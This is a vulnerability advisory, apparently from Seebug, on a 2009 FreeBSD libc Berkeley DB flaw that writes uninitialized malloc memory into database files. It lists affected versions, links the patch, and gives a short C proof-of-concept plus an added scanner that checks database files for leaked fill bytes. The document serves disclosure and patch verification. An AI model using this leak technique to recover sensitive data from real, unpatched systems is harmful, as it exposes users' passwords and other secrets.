seebug | Root | SSV:5093
Apr 23, 2009 - 12:00 a.m.

FreeBSD libc Berkeley DB Interface Uninitialized Memory Local Information Disclosure Vulnerability


BUGTRAQ ID: 34666
CNCAN ID:CNCAN-2009042302

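FreeBSD is an open-source BSD operating system.
The FreeBSD libc Berkeley DB interface writes uninitialized memory obtained from malloc(3) to database files. A local attacker can exploit this vulnerability to obtain sensitive information.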

FreeBSD FreeBSD 7.1-STABLE
FreeBSD FreeBSD 7.1-RELEASE-p4
FreeBSD FreeBSD 7.1 -RELEASE-p2
FreeBSD FreeBSD 7.1 -RELEASE-p1
FreeBSD FreeBSD 7.1 -PRE-RELEASE
FreeBSD FreeBSD 7.0-STABLE
FreeBSD FreeBSD 7.0-RELEASE-p8
FreeBSD FreeBSD 7.0-RELEASE-p11
FreeBSD FreeBSD 7.0-RELEASE
FreeBSD FreeBSD 7.0 BETA4
FreeBSD FreeBSD 7.0 -RELENG
FreeBSD FreeBSD 7.0 -RELEASE-p9
FreeBSD FreeBSD 7.0 -PRERELEASE
FreeBSD FreeBSD 7.0
FreeBSD FreeBSD 6.4-RELEASE-p2
FreeBSD FreeBSD 6.4 -RELEASE-p3
FreeBSD FreeBSD 6.4 -RELEASE
FreeBSD FreeBSD 6.3 -RELENG
FreeBSD FreeBSD 6.3 -RELEASE-p9
FreeBSD FreeBSD 6.3 -RELEASE-p8
FreeBSD FreeBSD 6.3 -RELEASE-p6
FreeBSD FreeBSD 6.3
See the following patch information. The same patch is listed for each of the FreeBSD versions above:
FreeBSD libc.patch
http://security.freebsd.org/patches/SA-09:07/libc.patch


The following program can be used to test:

#include <sys/types.h>
#include <db.h>
#include <err.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int
main(void)
{
	const char data[] = "abcd";
	DB *db;
	DBT dbt;

	/*
	 * Set _malloc_options to "J" so that all memory obtained from
	 * malloc(3) is initialized to 0xa5. See malloc(3) manual page
	 * for additional information.
	 */
	_malloc_options = "J";

	/* Create a fresh hash database. */
	db = dbopen("test.db", O_RDWR | O_CREAT | O_TRUNC, 0644, DB_HASH, NULL);
	if (db == NULL)
		err(1, "dbopen()");

	/* Store one record, using the same DBT as both key and value. */
	dbt.data = (void *)data;
	dbt.size = sizeof(data);
	if (db->put(db, &dbt, &dbt, 0) != 0)
		err(1, "db->put()");
	db->close(db);
	return (0);
}
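Running the program shows that test.db contains 0xa5 bytes that came from malloc(3). PR 123529
(http://www.freebsd.org/cgi/query-pr.cgi?pr=123529) confirms a real-world case that led to the disclosure of sensitive password information.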
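
A way to check the result described above, as an added example that is not part of the original advisory or of FreeBSD: it scans a database file such as the test program's test.db for runs of the 0xa5 fill byte. The function names and the 8-byte minimum run length are assumptions of this example.

```c
#include <stdio.h>
#include <stdlib.h>
#define JUNK_BYTE 0xa5	/* fill value the page reports in test.db */
#define MIN_RUN   8	/* assumption: shorter runs may be ordinary data */

/* Count bytes lying in runs of >= MIN_RUN JUNK_BYTEs; report longest run. */
size_t junk_scan(const unsigned char *buf, size_t len, size_t *longest)
{
	size_t i, run = 0, hits = 0;
	*longest = 0;
	for (i = 0; i <= len; i++) {
		if (i < len && buf[i] == JUNK_BYTE) {
			run++;
			continue;
		}
		hits += (run >= MIN_RUN) ? run : 0;	/* a run ended (or EOF) */
		*longest = (run > *longest) ? run : *longest;
		run = 0;
	}
	return hits;
}

/* Read a whole database file and scan it; returns -1 on I/O error. */
long junk_scan_file(const char *path, size_t *longest)
{
	FILE *fp = fopen(path, "rb");
	unsigned char *buf;
	long size = -1, hits = -1;
	if (fp == NULL)
		return -1;
	if (fseek(fp, 0, SEEK_END) == 0 && (size = ftell(fp)) >= 0 &&
	    fseek(fp, 0, SEEK_SET) == 0 && (buf = malloc((size_t)size + 1)) != NULL) {
		if (fread(buf, 1, (size_t)size, fp) == (size_t)size)
			hits = (long)junk_scan(buf, (size_t)size, longest);
		free(buf);
	}
	fclose(fp);
	return hits;
}

int main(int argc, char **argv)
{
	size_t longest = 0;
	long hits = junk_scan_file(argc > 1 ? argv[1] : "test.db", &longest);
	if (hits < 0)
		return 2;
	printf("%ld junk bytes in runs >= %d, longest %zu\n", hits, MIN_RUN, longest);
	return hits > 0;
}
```

The exit status is 1 when junk runs are found, 0 when the file is clean and 2 on a read error, so the check can be scripted before and after applying libc.patch.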